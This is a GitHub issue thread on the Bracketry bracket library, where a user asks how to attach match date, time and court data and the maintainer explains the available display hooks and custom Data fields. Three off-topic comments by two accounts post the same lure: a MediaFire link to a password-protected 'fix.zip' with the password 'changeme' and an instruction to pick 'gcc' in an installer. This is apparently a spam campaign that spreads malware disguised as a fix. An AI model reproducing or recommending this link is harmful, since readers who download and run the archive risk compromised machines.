### ISSUE TITLE
Extra data?

### ISSUE THREAD

**Issue by peterlondon1** [sbachinin/playoffs#6]
If I wanted to add extra information about each Match, say match date, time and court, is there any hook to connect such data? 

I know I can use getMatchTopHTML() to inject extra information, the issue is how to organise this extra information and bring it to the HTML page. It would be great if there was a part of the standard Bracketry Data structure that could be extended for such use.

Thanks.

**Comment by sbachinin** [comment]
I think time and court you can provide as `matchStatus` in your data. (It can be any HTML string, styled as you like).
There are no other built-in slots for such info except matchStatus and matchTop.
If more customization is needed, currently the only way is to use `getMatchElement` where you construct everything yourself.

In theory I can add more slots but only if it's something conventional and widely used in other bracket solutions. But currently I have no such ideas.

**Comment by peterlondon1** [comment]
If you use matchStatus that gets displayed in a set position (the "RETIRED" slot) to the right of the player names.

**Comment by sbachinin** [comment]
I assume that time & similar data is often displayed in this position

**Comment by peterlondon1** [comment]
If one used `matchStatus` it would expand the size of the draw a lot horizontally. I wanted to use `getMatchTopHTML()` to place court info above the player names without increasing the horizontal size of each "match".

I will be able to create some mechanism to get the data in, but if your Data structure could accommodate extra custom data for each match that would make it **much** simpler.

But I understand you are probably busy with a lot of other things, and I'm very grateful regardless for your great library!

**Comment by sbachinin** [comment]
I'm not sure I understand your idea about extra data.
You can add any arbitrary data to Data object, and I can add some new "official" fields, but the question is, where to display this data.
Currently you have the means to display anything at top, right and bottom (I forgot about `getMatchBottomHTML`). I think it must be enough to tell everything about the match

If matchStatus makes your matches too wide, then provide an html string where everything is made narrower using css (something like `<div style="max-width: 150px">time</div>`)

**Comment by ChangjingZhang** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ChangjingZhang** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by peterlondon1** [comment]
Apologies! I read your comment above the description of `Data` "_The only possible shape of data (one which can be passed to [createBracket](https://bracketry.app/create-bracket)) is described in this d.ts file_". I took this to mean I couldn't change it at all.

But, as you say, **I can**! And now I'm sorted, thanks. (Perhaps you could add to your description of Data something like "Extra custom fields can be added to supply extra information about elements within this structure"?)

Thanks again for your help!

**Comment by sbachinin** [comment]
Thanks, I’ll try to rephrase this statement

**Comment by NaiveShiki** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by peterlondon1** [comment]
Have noticed your added text! Cheers.
